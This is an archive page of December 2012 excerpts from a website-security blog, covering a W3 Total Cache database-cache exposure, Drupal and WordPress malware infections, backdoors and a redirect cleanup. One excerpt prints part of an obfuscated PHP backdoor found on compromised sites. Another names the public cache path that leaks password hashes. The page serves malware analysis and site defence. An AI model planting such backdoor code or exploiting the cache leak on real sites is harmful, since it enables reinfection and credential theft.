Archives for December 2012

W3 Total Cache Implementation Vulnerability

Just in time for Christmas, it was announced on the full disclosure list a security (configuration/implementation) bug on W3 Total cache (W3TC), one of the most popular WordPress plugins.

The issue is connected to the way W3TC stores the database cache (in a public accessible directory). It can be used to retrieve password hashes and other database information.

By default the plugin will store the caches inside /wp-content/w3tc/dbcache/ and if you have directory listing enabled, anyone can browse to and download them. The second issue is that even if you don’t have directory listing enabled, it is still possible to guess those directories/files in order to extract the database cache queries and results.

Read More

Website Malware – Drupal Injections Targeting Cookies

Many folks are unfamiliar with the Drupal CMS, it doesn’t enjoy the popularity that some others do like WordPress and Joomla, but its a powerful CMS none the less. What it does have in common with its counterparts is that its susceptible to attacks and infections. We don’t often write about it, but we do work on the platform. We decided to give it some attention this week because of the increased number of Drupal infections we’re seeing.

They’re slightly different when compared to other CMS applications and so is the remediation process. In this post we’ll show an infection that seems to be all the craze this week, findings courtesy of Fioravante Souza – one of Sr Malware Engineers.

The Payload

Most of the sites infected with this payload are also accompanied by other iframe injections. Those iframe injections are not special, they are often attached to every file – PHP, JS, HTML, and beging with document.write and reference some file like cgi?5 or cfg?11. If you have some terminal sense you should be able to find them and remove them, if you need help you can always use our free scanner, it’ll display any payloads hitting the readers browser. Here is the payload though that we were most interested in as it was obfuscated and very painful to find and remove.

Read More

Website Malware – Sharp Increase in SPAM Attacks – WordPress & Joomla

This past week we have seen a sharp increase in the use of old tactics designed to poison your search engine results – also known as Search Engine Poisoning (SEP) attacks. If you use our free scanner, SiteCheck, you’ll likely see something like the following:

Sucuri - ViewState Infection

You’re probably wondering, what the heck, how is that SEO SPAM? Allow me to explain what this is doing.

Read More

Website Malware – Reality of Cross-Site Contaminations

Sometimes you can’t help but put yourself in the shoes of your clients and skeptics and wonder how many times they roll their eyes at the things you says. Cross-site contamination is one of those things.

We first start writing about it in March of 2013 in a little post that got a lot of attention, “A Little Tale About Website Cross Contamination”. In that case we talked to how the attack vector was coming from a neighboring site that had since been neglected, in turn it was now housing the generating payload that was affecting the live sites. All in all, it was a sad and depressing story.

In this case, it’s unique in that it’d fall into what we would categorize a targeted attack. That’s right, the complete opposite of what we often tell most readers they fall into, opportunistic attacks. I will caveat that it’s not known for sure, but after reading this we’ll let you be the judge.

/* It’s nothing personal, it’s just business */

Read More

WordPress 3.5 Released

Update like it’s hot!

Today marks the release of WordPress 3.5 (Named Elvin after jazz drimmer Elvin Jones), a major release this year for the WordPress project.

WordPress 3.5

This release highlights some very significant changes to anything from the JavaScript libraries being used, to a brand new Media Manager. Although there are no security fixes highlighted, there were various bugs fixed along with the newly added features.

Read More

Web Malware – Working with Evil Backdoors – Part III

The most complicated part of our job, when cleaning compromised web sites, is ensuring we find all backdoors. If we miss one, the site can be reinfected. We have done a few posts about backdoors already, explaining how they work and in them provide example of what they are and look like:

However, despite being a very complicated task, most people still think that removing backdoors consist of searching for eval’s, base64_decode and similar keywords. While that will find some, it’s not highly effective.

Ugly Backdoor

Today, we will present you the BACKDOOR:UGLY:13 (yes, that’s how we name it). It is a code we are finding on WordPress/Joomla sites compromised with SEO Spam to allow the attackers to reinfect and reinject spam code:

‘ ,|:F-2>1u@:”‘.qgQ1.'<*’^EMR.'”@’.tKU2.’$Ln&)(hkx’;$Arb=’>8a’^Mb9;’Tpr’.
‘.=8l`5’&’RVN]m.l}z^H>’;$QgYL=’ “.’.DAMT.’%#Q’|’ $+(<TH@T-#A’;$GDWkPb=’@*’.
‘$p4″W-,’|’0!&c`v!,0>4$OP0 f#p’)^$GDWkPbCn5;$DP7=(‘5$ C1=”E+c.’.g27mr.#DfTy’.
‘%!’.r0x66.'<22@5x’|’!4(2rc>`3a?!73 ‘.cH9a.’$`<34(“y+P’)&(‘{jWR%O.%1m^R%-<B’.
‘{/7p”‘.fjlb.’ =i,’^’;os0}>?,Qd{(l’)|$_bGCvD;if($g1MRqXRy($Db_3w(/*BZKHhHPA’.
‘n*/$niZ),$eBwDr2V.$ArvQhb.(‘lv^9{p’^'”C<T6M’));#medAQT)W(Azd-,JG ?f.Er?2R’.

Read More

Sucuri SiteCheck Malware Scanner Plugin for WordPress

If you’re a WordPress user, love our free SiteCheck scanner, or already use our free SiteCheck Malware Scanner Plugin for WordPress, we have an update for you.

Sucuri Security - SiteCheck Malware Scanner

Read More

Sucuri Launches Rapid+ Monitoring

A common feature our clients have been asking us for a long time is the ability to monitor their sites more frequently. For some high profile sites, scans every 6 hours is not enough.

Today we are happy to announce that we added the Sucuri Rapid+ Monitoring option to allow our customers to decrease their monitoring frequency down to every 30 minutes.

Read More

PSA: December Zero Day’s Announced – MySQL, FreeSSH, Free FTPD

So it looks like we’re closing out the year in style in 2012. This weekend a number of new, very serious, zero-day vulnerabilities were released for a number of very popular applications – MySQL, FreeSSH, Free FTPD.




Of the three, the most concerning is obviously MySQL. If you listen to any of our security presentations you know that your application is but one piece of the puzzle, and you environment is a critical component of that puzzle too.

MySQL is integral to any LAMP based application – LAMP = Linux, Apache, MySQL, PHP – this includes many open source content management systems (CMS) like WordPress, Joomla, Drupal, Magento, osCommerce and many more. This is exceptionally dangerous to those environments in which MySQL is being published (i.e., not bound to itself or it’s port open) to the world and applies to VPS and Shared environments alike.

JavaScript Redirect Using Multiple Outdated Websites

This is a doozy. This case was really interesting to remediate as it consisted of multiple outdated websites in a shared environment.

JavaScript Redirect Using Multiple Outdated Websites

We’re talking known vulnerable instances of WordPress and TimThumb here. There were more than 8 websites on the server (All running sub-3.2 of WordPress), and the backdoors and malicious payloads distributed across 3 websites.

I am going to break it down for you, and also show how challenging it can be to clear all the malware affecting a website in shared environment.

1. The Initial Request

One of our customers submitted a cleanup request for one of his/her websites. The description of the problem:

When you log into my website, it re-directs you to somewhere else.

Awesome, I got this!

I naturally dropped the URL in a browser to check it out, here’s what I got:

Malicious redirect

I had just replicated what our customer had noted. If you tried bringing up website #1 in a browser it would redirect to somewhere else. Good thing for him that it wasn’t redirecting somewhere worse like a porn site, or a Viagra ad :/

Start the Cleanup

Time to get into the server, files, and other fun stuff.

After checking out the site and seeing it’s unwanted behavior, I did a free remote scan with Sucuri SiteCheck. SiteCheck isn’t perfect, but it’s a damn useful tool, and nine times out of ten gives me valuable information about the website, the malware attacking the site, and even useful server level data.

SiteCheck was spotting some odd business going on and gave me a good general idea of what may be going on:

I logged in via sFTP to the site and started running some tests. First thing I did was run a version check across the known software on the server, here’s what I got:

Warning: Found outdated timthumb.php version at ..//website1/wp-content/themes/
theme/timthumb.php (bellow 2.0). 

Warning: Found outdated WordPress install inside: ..//website1 - Version: $wp_version = '3.2.1';

Warning: Found outdated WordPress install inside: ..//website2 - Version: $wp_version = '3.2.1';

Warning: Found outdated timthumb.php version at ..//website2/wp-content/themes/
theme/timthumb.php (bellow 2.0).

Warning: Found outdated WordPress install inside: ..//backup - Version: $wp_version = '3.0.1';

Warning: Found outdated timthumb.php version at ..//backup/wp-content/themes/
theme/timthumb.php (bellow 2.8.2). 

Website #3

Location of JavaScript Redirect code – /public_html/website3/wp-content/backups/20100425-1849/root/wp-includes/js/tinymce/plugins/inlinepopups/skins

Website URL for redirect –